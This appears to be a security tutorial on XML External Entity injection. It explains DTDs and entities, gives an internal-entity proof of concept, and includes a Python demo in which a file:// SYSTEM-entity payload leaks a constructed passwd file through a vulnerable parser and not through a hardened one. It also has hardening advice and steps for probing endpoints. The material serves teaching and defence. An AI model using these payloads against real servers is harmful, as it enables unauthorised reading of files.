
XML External Entity Injection [XXE]




  • Extensible Markup Language (XML) was designed for desktop publishing and is now widely used for data exchange
    • It is a markup language similar to HTML, but its tags describe data rather than presentation
    • XML is typically used instead of HTML when data must be sent from one application to another (data interchange), i.e. it acts as a common wire format between systems [JSON and XML are two common examples]



Attackers can exploit how an application parses XML by taking advantage of an XXE vulnerability. More specifically, it involves exploiting how the application processes the inclusion of external entities in its input. An attacker can use XXE to extract information from a server or to make the server call out to a malicious host.


An attacker can exploit a vulnerable XML processor if they can upload XML or include hostile content in an XML document. By exploiting vulnerable code, dependencies, and integrations, these flaws can be used to extract information (local files), make the server send a request to a malicious host (SSRF), scan internal systems, or perform denial of service (for example via recursive entity expansion).


Example :

—————


<?xml version="1.0" encoding="UTF-8"?>
<Jobs>
  <Job>
    <Title>Test</Title>
  </Job>
</Jobs>





Document Type Definition

——————————————


 A valid XML document must follow the general XML syntax rules and match a document type definition (DTD). An XML DTD is a set of declarations that define which elements exist, what attributes they can have, and which elements can be enclosed within other elements. (An element consists of the opening and closing tags: an opening <foo> is a tag and a closing </foo> is also a tag, but <foo></foo> is an element.) A DTD can also declare entities: named pieces of content that the parser substitutes wherever the entity is referenced. An internal entity carries its value as a literal string; an external entity points at another resource with a SYSTEM (or PUBLIC) identifier, typically a URL, and it is this resolution of external references that XXE abuses. XML files can either use an external DTD, or they can use an internal DTD that is defined within the XML document.


We update the XML to add an internal DTD that declares an entity. The PoC below uses an internal entity (a literal string) to confirm that the parser reads the DTD and expands entities at all; an external entity, declared with SYSTEM and a URI, is the next step and is what gives the attack its name. Note that the DOCTYPE names foo while the root element is Jobs: a validating parser would reject the document, but the non-validating parsers found in most applications do not care and still expand the entity.


POC Example :

———————


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [                    <!-- declares the document type; foo is the expected root element name -->
<!ELEMENT foo ANY>                 <!-- element foo may contain any content -->
<!ENTITY XXE "IT WORKS !!">        <!-- entity XXE expands to "IT WORKS !!" wherever &XXE; is referenced -->
]>
<Jobs>
  <Job>
    <Title>&XXE;</Title>
  </Job>
</Jobs>
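The PoC above only proves that entities are expanded; the file-extraction case described earlier in the page (an external entity pointing at a local file) is the one that matters. The following Python script is an added example, not code from the original post: it runs the page's internal-entity PoC and then a SYSTEM entity payload through the standard-library SAX parser twice, once with external general entity resolution switched on (the setting an old or misconfigured parser has) and once with it off (the Python default since 3.7.1), and returns what lands in the <Title> element each time. The secret file, its content, and the names TitleCollector, parse_titles, internal_entity_payload, external_entity_payload and demo are all constructed for this example.

```python
"""XXE demonstration with the standard-library SAX parser (xml.sax / expat).

Added example: shows the page's internal-entity PoC, then a file:// SYSTEM entity
read through a parser that resolves external general entities, beside the hardened
parser that refuses to resolve them.
"""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file such as /etc/passwd (hypothetical content).
SECRET_CONTENT = "root:x:0:0:root:/root:/bin/bash\nsvc:x:1001:1001::/srv/app:/usr/sbin/nologin\n"


class TitleCollector(ContentHandler):
    """Collects the text of every <Title> element, as a job-import endpoint might."""

    def __init__(self):
        super().__init__()
        self.titles = []
        self._buf = None  # list of text chunks while inside <Title>, otherwise None

    def startElement(self, name, attrs):
        if name == "Title":
            self._buf = []

    def characters(self, content):
        # Entity replacement text (internal or external) is delivered here as ordinary text.
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "Title":
            self.titles.append("".join(self._buf))
            self._buf = None


def internal_entity_payload():
    """The page's PoC: an internal entity, expanded by any parser that reads the DTD."""
    return b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY XXE "IT WORKS !!">
]>
<Jobs><Job><Title>&XXE;</Title></Job></Jobs>"""


def external_entity_payload(file_uri):
    """Classic file-disclosure XXE: an external entity whose SYSTEM id is a file:// URI."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Jobs [
<!ENTITY xxe SYSTEM "{file_uri}">
]>
<Jobs><Job><Title>&xxe;</Title></Job></Jobs>""".encode("utf-8")


def parse_titles(xml_bytes, resolve_external_entities):
    """Parse with xml.sax and return the collected <Title> texts.

    resolve_external_entities=True models a parser configured (or old enough) to fetch
    external general entities; False is the safe setting and the Python default since 3.7.1.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TitleCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.titles


def demo():
    """Return (internal, leaked, safe): the internal-entity expansion, the file contents
    leaked through the vulnerable parser, and what the hardened parser yields for the
    same external-entity payload (an empty string: the reference is silently dropped)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "passwd"  # constructed target file, not a real system file
        secret.write_text(SECRET_CONTENT)
        payload = external_entity_payload(secret.as_uri())  # file:///.../passwd
        internal = parse_titles(internal_entity_payload(), False)[0]
        leaked = parse_titles(payload, True)[0]
        safe = parse_titles(payload, False)[0]
    return internal, leaked, safe


if __name__ == "__main__":
    internal, leaked, safe = demo()
    print("internal entity expanded to:", repr(internal))
    print("vulnerable parser leaked:", repr(leaked))
    print("hardened parser returned:", repr(safe))
```

The hardened branch is simply the parser left in its default state: external general entities are not fetched, so the reference expands to nothing. When hardening a real application, go further than that single feature: disable external parameter entities as well (feature_external_pes), or reject any document carrying a DOCTYPE at all (defusedxml does this for the standard-library parsers; lxml's XMLParser takes resolve_entities=False and no_network=True). Note that the internal entity still expands in the hardened run, which is exactly why the harmless "IT WORKS !!" PoC on this page is only a first signal and not proof that files can be read.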




SPILLING LOCAL FILES VIA XXE WHEN HTTP OOB FAILS


https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html




If the endpoint normally accepts a form or JSON body, change the Content-Type header of the request to `application/xml` and resend the body as XML. Check whether the application actually processes it: element values reflected in the response, or an XML parse error returned when you send a deliberately malformed document, are both good signals. If it is processed, you can go on and test for XXE, starting with a harmless internal entity as in the PoC above and then moving to a SYSTEM entity.
